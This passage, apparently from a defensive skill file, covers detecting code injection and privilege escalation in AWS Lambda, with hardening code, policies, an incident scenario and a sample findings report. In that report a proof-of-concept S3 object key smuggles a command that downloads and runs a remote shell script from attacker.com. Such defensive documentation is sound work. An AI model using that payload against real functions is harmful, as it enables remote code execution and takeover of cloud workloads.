),\n}\n\ndef validate_event(schema):\n \"\"\"Decorator that validates Lambda event against a whitelist schema.\"\"\"\n def decorator(func):\n @wraps(func)\n def wrapper(event, context):\n for field, pattern in schema.items():\n value = event.get(field, '')\n if isinstance(value, str) and not pattern.match(value):\n return {\n 'statusCode': 400,\n 'body': json.dumps({'error': f'Invalid {field}'})\n }\n return func(event, context)\n return wrapper\n return decorator\n\n@validate_event(SAFE_PATTERNS)\ndef handler(event, context):\n # Event data is validated before reaching this point\n user_id = event['userId']\n # Safe to use in queries with parameterized statements\n return {'statusCode': 200, 'body': json.dumps({'user': user_id})}","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Lambda function URL authorization","type":"text","marks":[{"type":"strong"}]},{"text":": Ensure functions exposed via URLs require IAM auth:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"aws lambda get-function-url-config --function-name \u003cname> \\\n --query 'AuthType' --output text\n# Must return \"AWS_IAM\", not \"NONE\"","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Least privilege execution roles","type":"text","marks":[{"type":"strong"}]},{"text":": Restrict the function's IAM role to the minimum required permissions:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"json"},"content":[{"text":"{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"dynamodb:GetItem\",\n \"dynamodb:PutItem\"\n ],\n \"Resource\": \"arn:aws:dynamodb:us-east-1:111122223333:table/UserTable\"\n },\n {\n \"Effect\": \"Allow\",\n \"Action\": \"logs:*\",\n \"Resource\": \"arn:aws:logs:us-east-1:111122223333:log-group:/aws/lambda/my-function:*\"\n }\n ]\n}","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SCP to prevent dangerous Lambda modifications","type":"text","marks":[{"type":"strong"}]},{"text":": Apply a Service Control Policy at the organization level to restrict who can modify Lambda functions and pass roles:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"json"},"content":[{"text":"{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Sid\": \"DenyLambdaCodeUpdateExceptCICD\",\n \"Effect\": \"Deny\",\n \"Action\": [\n \"lambda:UpdateFunctionCode\",\n \"lambda:UpdateFunctionConfiguration\"\n ],\n \"Resource\": \"*\",\n \"Condition\": {\n \"StringNotLike\": {\n \"aws:PrincipalArn\": \"arn:aws:iam::*:role/CICD-DeploymentRole\"\n }\n }\n }\n ]\n}","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"AWS Lambda Powertools for structured logging","type":"text","marks":[{"type":"strong"}]},{"text":": Emit structured security events that can be ingested by SIEM:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"python"},"content":[{"text":"from aws_lambda_powertools import Logger, Tracer\nfrom aws_lambda_powertools.utilities.validation import validate\n\nlogger = Logger(service=\"payment-processor\")\ntracer = Tracer()\n\[email protected]_lambda_context\[email protected]_lambda_handler\ndef handler(event, context):\n logger.info(\"Processing event\", extra={\n \"source_ip\": event.get('requestContext', {}).get('identity', {}).get('sourceIp'),\n \"user_agent\": event.get('headers', {}).get('User-Agent'),\n \"http_method\": event.get('httpMethod'),\n })","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Key Concepts","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Term","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Definition","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Event Source Poisoning","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"An attack where malicious data is injected into a serverless event source (S3, SQS, DynamoDB Stream, API Gateway) to trigger code execution or injection when the function processes the event","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Function Injection","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Exploitation of unsanitized event data that flows into dangerous runtime functions (eval, exec, os.system, child_process.exec) within a serverless function handler","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Lambda Layer Hijacking","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"An attack where a malicious Lambda layer is attached to a function to intercept execution, override dependencies, or exfiltrate data by placing code in the runtime's module search path","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"IAM Privilege Escalation via Lambda","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"A technique where an attacker with UpdateFunctionCode and PassRole permissions modifies a function to execute with a higher-privilege IAM role, extracting temporary credentials","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"OWASP Serverless Top 10","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"A security framework identifying the ten most critical risks in serverless architectures, including injection (SAS-1), broken authentication (SAS-2), and over-privileged functions (SAS-6)","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Cold Start Injection","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"An attack that targets the function initialization phase where environment variables, layer code, and extensions execute before the handler, potentially in an unmonitored context","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Execution Role","type":"text","marks":[{"type":"strong"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"The IAM role assumed by a Lambda function during execution, providing temporary credentials that define the function's AWS API access permissions","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Tools & Systems","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Semgrep","type":"text","marks":[{"type":"strong"}]},{"text":": Static analysis tool with serverless-specific rule packs that detect event data flowing into injection sinks across Python, Node.js, Java, and Go Lambda runtimes","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Bandit","type":"text","marks":[{"type":"strong"}]},{"text":": Python-specific SAST tool that identifies security issues including use of eval, exec, subprocess with shell=True, and pickle deserialization","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"AWS CloudTrail","type":"text","marks":[{"type":"strong"}]},{"text":": Logs Lambda management events (UpdateFunctionCode, CreateFunction) and data events (Invoke) for detecting unauthorized modifications and anomalous invocation patterns","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"CloudWatch Logs Insights","type":"text","marks":[{"type":"strong"}]},{"text":": Query engine for searching Lambda execution logs for injection attempt indicators, runtime errors, and suspicious command patterns","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"AWS Config","type":"text","marks":[{"type":"strong"}]},{"text":": Evaluates Lambda function configurations against compliance rules including layer inventory, execution role permissions, and function URL authorization types","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Prowler","type":"text","marks":[{"type":"strong"}]},{"text":": Open-source AWS security assessment tool with Lambda-specific checks for public access, overprivileged roles, and missing encryption","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common Scenarios","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Scenario: Detecting and Responding to a Lambda-Based Privilege Escalation Attack","type":"text"}]},{"type":"paragraph","content":[{"text":"Context","type":"text","marks":[{"type":"strong"}]},{"text":": A SOC analyst receives a GuardDuty alert for ","type":"text"},{"text":"UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS","type":"text","marks":[{"type":"code_inline"}]},{"text":" on an IAM role used by multiple Lambda functions. Investigation reveals that an attacker compromised a developer's AWS credentials with ","type":"text"},{"text":"lambda:UpdateFunctionCode","type":"text","marks":[{"type":"code_inline"}]},{"text":" permissions and modified a payment processing function to exfiltrate the execution role's temporary credentials.","type":"text"}]},{"type":"paragraph","content":[{"text":"Approach","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Query CloudTrail for ","type":"text"},{"text":"UpdateFunctionCode","type":"text","marks":[{"type":"code_inline"}]},{"text":" events in the past 7 days to identify when the function was modified and by which principal:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"fields eventTime, userIdentity.arn, requestParameters.functionName, sourceIPAddress\n| filter eventName = \"UpdateFunctionCode20150331v2\"\n| filter requestParameters.functionName = \"payment-processor\"\n| sort eventTime desc","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Discover that the function was modified from an IP address in an unexpected geographic location at 02:47 UTC, outside of normal deployment windows","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Download the modified function code and find an injected snippet that POSTs ","type":"text"},{"text":"os.environ['AWS_ACCESS_KEY_ID']","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"AWS_SECRET_ACCESS_KEY","type":"text","marks":[{"type":"code_inline"}]},{"text":", and ","type":"text"},{"text":"AWS_SESSION_TOKEN","type":"text","marks":[{"type":"code_inline"}]},{"text":" to an external endpoint on each invocation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Check if the attacker also added a malicious layer by querying for ","type":"text"},{"text":"UpdateFunctionConfiguration","type":"text","marks":[{"type":"code_inline"}]},{"text":" events with layer changes","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify the function's execution role permissions: the payment-processor role has ","type":"text"},{"text":"dynamodb:*","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"s3:GetObject","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"s3:PutObject","type":"text","marks":[{"type":"code_inline"}]},{"text":", and ","type":"text"},{"text":"sqs:SendMessage","type":"text","marks":[{"type":"code_inline"}]},{"text":" across all resources, exceeding least privilege","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Search CloudTrail for API calls made by the exfiltrated credentials from outside AWS, finding ","type":"text"},{"text":"sts:GetCallerIdentity","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"s3:ListBuckets","type":"text","marks":[{"type":"code_inline"}]},{"text":", ","type":"text"},{"text":"dynamodb:Scan","type":"text","marks":[{"type":"code_inline"}]},{"text":" on the customer table, and ","type":"text"},{"text":"iam:CreateUser","type":"text","marks":[{"type":"code_inline"}]},{"text":" attempts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Respond by reverting the function code from the last known-good deployment package in the CI/CD artifact store, rotating the execution role's session tokens, and adding an SCP that restricts ","type":"text"},{"text":"lambda:UpdateFunctionCode","type":"text","marks":[{"type":"code_inline"}]},{"text":" to the CI/CD role only","type":"text"}]}]}]},{"type":"paragraph","content":[{"text":"Pitfalls","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Only checking the function code and missing malicious layers that persist even after the function code is reverted","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Not searching for lateral movement from the exfiltrated credentials to other AWS services, missing data exfiltration from DynamoDB or S3","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Failing to check if the attacker created new IAM users, access keys, or roles during the window the credentials were valid","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Restoring the function without first preserving the malicious code as forensic evidence","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Not implementing preventive controls (SCP, EventBridge alerting) after remediation, leaving the same attack path open","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Output Format","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"## Serverless Function Injection Assessment\n\n**Account**: 111122223333\n**Region**: us-east-1\n**Functions Analyzed**: 47\n**Event Source Mappings**: 23\n**Assessment Date**: 2026-03-19\n\n### Critical Findings\n\n#### FINDING-001: OS Command Injection in S3 Event Handler\n**Function**: image-resize-processor\n**Runtime**: python3.12\n**Severity**: Critical (CVSS 9.8)\n**Sink**: os.system() at handler.py:34\n**Source**: event['Records'][0]['s3']['object']['key']\n**Attack Vector**: Upload S3 object with key containing shell metacharacters\n**Proof of Concept**:\n Object key: `; curl http://attacker.com/shell.sh | bash`\n Results in: os.system(\"convert /tmp/; curl http://attacker.com/shell.sh | bash\")\n**Remediation**: Replace os.system() with subprocess.run() with shell=False\n and validate the S3 key against an allowlist pattern.\n\n#### FINDING-002: IAM Privilege Escalation Path\n**Function**: data-export-worker\n**Execution Role**: arn:aws:iam::111122223333:role/DataExportRole\n**Role Permissions**: s3:*, dynamodb:*, iam:PassRole, lambda:*\n**Risk**: Any user with lambda:UpdateFunctionCode can modify this function\n to execute arbitrary AWS API calls with AdministratorAccess-equivalent permissions.\n**Remediation**: Apply least privilege to the execution role, restrict\n lambda:UpdateFunctionCode via SCP to CI/CD pipeline role only.\n\n#### FINDING-003: Unauthorized Layer Attached\n**Function**: auth-token-validator\n**Layer**: arn:aws:lambda:us-east-1:999888777666:layer:utility-lib:3\n**Layer Account**: External account (999888777666)\n**Risk**: Layer from untrusted external account can intercept all function\n invocations, modify responses, or exfiltrate environment variables.\n**Remediation**: Remove the external layer, vendor the dependency into the\n function's deployment package, add AWS Config rule to block external layers.\n\n### Detection Rules Deployed\n- EventBridge rule: Alert on UpdateFunctionCode from non-CI/CD principals\n- CloudWatch alarm: Function error rate spike > 3x baseline in 5 minutes\n- Config rule: Lambda functions must not have layers from external accounts\n- Config rule: Lambda execution roles must not have wildcard resource permissions","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"detecting-serverless-function-injection","tags":["serverless-security","Lambda-injection","event-source-poisoning","OWASP-serverless","IAM-escalation","CloudTrail"],"author":"@skillopedia","domain":"cybersecurity","source":{"stars":13207,"repo_name":"anthropic-cybersecurity-skills","origin_url":"https://github.com/mukul975/anthropic-cybersecurity-skills/blob/HEAD/skills/detecting-serverless-function-injection/SKILL.md","repo_owner":"mukul975","body_sha256":"2b62b4d165cf492dd5ea04bb66679dc9fe74f9aea7731c04032770ce78ad0605","cluster_key":"79700da4ff1c8229f93410c91345eb56dc3ed8339571d7375c560cd093079cf8","clean_bundle":{"format":"clean-skill-bundle-v1","source":"mukul975/anthropic-cybersecurity-skills/skills/detecting-serverless-function-injection/SKILL.md","attachments":[{"id":"67df3147-b0c3-567f-b23c-d69136902592","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/67df3147-b0c3-567f-b23c-d69136902592/attachment.md","path":"references/api-reference.md","size":5121,"sha256":"9c39fe985ee752ce9ba78520c9b25a0e70859270e4f2ef35558696cf95f1ab21","contentType":"text/markdown; charset=utf-8"},{"id":"593264bf-0d9e-526c-aa1e-73d444bd770e","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/593264bf-0d9e-526c-aa1e-73d444bd770e/attachment.py","path":"scripts/agent.py","size":26531,"sha256":"5bb0aacb3f512a997f6f024e08902feac3c8d0d5f400e01c60122bc71ea07551","contentType":"text/x-python; charset=utf-8"}],"bundle_sha256":"83730f3611cc96cee31c8751c2cae877836bac2a5b2f395a5ae0636d4732420a","attachment_count":2,"text_attachments":2,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/detecting-serverless-function-injection/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"license":"Apache-2.0","version":"v1","category":"security","nist_csf":["PR.IR-01","ID.AM-08","GV.SC-06","DE.CM-01"],"subdomain":"cloud-security","import_tag":"clean-skills-v1","description":"Detects and prevents code injection attacks targeting serverless functions (AWS Lambda, Azure Functions, Google Cloud Functions) through event source poisoning, malicious layer injection, runtime command execution, and IAM privilege escalation via function modification. The analyst combines static analysis of function code, CloudTrail event correlation, runtime behavior monitoring, and IAM policy auditing to identify injection vectors across the expanded serverless attack surface including API Gateway, S3, SQS, DynamoDB Streams, and CloudWatch event triggers. Activates for requests involving Lambda security assessment, serverless injection detection, function event poisoning analysis, or serverless privilege escalation investigation.\n"}},"renderedAt":1782986367778}

Detecting Serverless Function Injection When to Use - Auditing Lambda/Cloud Functions for code injection vulnerabilities where unsanitized event data flows into dangerous runtime functions ( , , , ) - Investigating incidents where an attacker modified function code or layers to establish persistence or exfiltrate data from the serverless environment - Detecting privilege escalation paths where an adversary with and can assume higher-privilege execution roles - Analyzing event source poisoning attacks where malicious payloads are injected through S3 object uploads, SQS messages, DynamoDB strea…